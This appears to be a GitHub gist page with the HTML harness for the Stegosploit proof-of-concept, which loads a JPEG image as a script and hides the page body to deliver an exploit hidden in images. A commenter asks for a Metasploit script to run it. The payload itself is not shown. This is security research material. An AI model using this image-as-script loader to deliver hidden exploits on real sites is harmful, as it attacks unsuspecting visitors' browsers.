Skip to content

Instantly share code, notes, and snippets.

@christianbundy
Last active August 29, 2015 14:22
Show Gist options
  • Save christianbundy/baf9e9a215d6338beb84 to your computer and use it in GitHub Desktop.
Save christianbundy/baf9e9a215d6338beb84 to your computer and use it in GitHub Desktop.
Source HTML for Stegosploit proof-of-concept by Saumil Shah.
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE-Edge">
<style>
body { visibility: hidden; }
img { visibility: visible; }
</style>
<script src="elephant3.jpg"></script>
</head>
<body>
<form id="testfm">
<textarea id="child" value="a1" ></textarea>
<input id="child2" type="checkbox"name="option2" value="a2">Test check<Br>
<textarea id="child3" value="a2" ></textarea>
<input type="text" name="test1">
</form>
<br>
<img src="#">
<img src="elephant3.jpg">
<img src="elephant2.jpg" id="pngdata" onload="setOnMouseOver()">
<div id="target"></div>
</body>
</html>
@volcano-anon
Copy link

is there any python script or ruby to run stegosploit with metasploit framework

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment